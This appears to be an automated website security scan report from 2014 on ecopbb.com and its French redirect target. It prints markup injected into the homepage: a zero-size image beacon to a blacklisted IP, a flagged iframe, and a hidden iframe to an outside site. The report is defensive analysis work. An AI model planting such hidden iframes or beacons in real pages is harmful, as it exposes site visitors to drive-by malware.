Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ecopbb.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://ecopbb.com/ | HTTP/1.1 302 Found Connection: close Date: Thu, 18 Dec 2014 23:51:20 GMT Location: http://www.ecopbb.fr/ Server: Apache Content-Length: 205 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.ecopbb.fr/ | 200 OK Content-Length: 19733 Content-Type: text/html | malicious |
Page code contains blacklisted domain: 5.61.34.53 ...[1643 bytes skipped]... type='wordpress3.4.2';</script><script type="text/javascript" src="http://www.ecopbb.fr/wp-content/themes/ecopbb/js/jquery-1.6.1.min.js"></script> <script type="text/javascript" src="http://www.ecopbb.fr/wp-content/themes/ecopbb/js/jquery.cycle.all.min.js"></script> <script type="text/javascript" src="http://www.ecopbb.fr/wp-content/themes/ecopbb/js/main.js"></script> <img src="http://5.61.34.53/2c3r" style="width:0px; height: 0px;border:0;"/> </head> <!-- END html head --> <body> <!-- BEGIN wrapper --> <div id="wrapper"> <!-- BEGIN header --> <div id="header" </tr> </tfoot> <tbody> <tr><td>1</td><td>2</td><td>3</td><td>4</td><td>5</td><td>6</td><td>7</td> </tr> < ...[2581 bytes skipped]... Malicious iFrame found. size: 150x600 src: http://cbm.ecopbb.fr/ws/matchs.php This URL is marked by Google as suspicious <iframe style="border: none;" src="http://cbm.ecopbb.fr/ws/matchs.php" width="150%" height="600"> Hidden iFrame found. size: 700x150 style: hidden src: http://www.loxiastudio.com/i-gmt <iframe src="http://www.loxiastudio.com/i-gmt" width="700" height="150" scrolling="no" frameborder="0" allowtransparency="true"style="visibility:hidden" onload="this.style.visibility='visible'"> | ||
http://detect.deviceatlas.com/redirect.js?m=http://ecopbb.fr&smart=off | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 18 Dec 2014 23:51:22 GMT Location: http://detect-deviceatlas-com.appspot.com/redirect.js?m=http://ecopbb.fr&smart=off Server: nginx/1.6.2 Content-Length: 184 Content-Type: text/html Set-Cookie: SERVERID=ww1; path=/ | clean |
http://detect-deviceatlas-com.appspot.com/redirect.js?m=http://ecopbb.fr&smart=off | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://detect-deviceatlas-com.appspot.com/test404page.js | 404 Not Found Content-Length: 52 Content-Type: text/plain | clean |
http://w.sharethis.com/button/buttons.js | 200 OK Content-Length: 150720 Content-Type: application/x-javascript | clean |
http://www.ecopbb.fr/wp-content/themes/ecopbb/js/jquery-1.6.1.min.js | 200 OK Content-Length: 91360 Content-Type: application/x-javascript | clean |
http://www.ecopbb.fr/wp-content/themes/ecopbb/js/jquery.cycle.all.min.js | 200 OK Content-Length: 32046 Content-Type: application/x-javascript | clean |
http://www.ecopbb.fr/wp-content/themes/ecopbb/js/main.js | 200 OK Content-Length: 2821 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ecopbb.com
Result:
HTTP/1.1 302 Found
Connection: close
Date: Thu, 18 Dec 2014 23:51:20 GMT
Location: http://www.ecopbb.fr/
Server: Apache
Content-Length: 205
Content-Type: text/html; charset=iso-8859-1
...205 bytes of data.
GET / HTTP/1.1
Host: ecopbb.com
Result:
HTTP/1.1 302 Found
Connection: close
Date: Thu, 18 Dec 2014 23:51:20 GMT
Location: http://www.ecopbb.fr/
Server: Apache
Content-Length: 205
Content-Type: text/html; charset=iso-8859-1
...205 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: ecopbb.com
Referer: http://www.google.com/search?q=ecopbb.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ecopbb.com
Referer: http://www.google.com/search?q=ecopbb.com
Result:
The result is similar to the first query. There are no suspicious redirects found.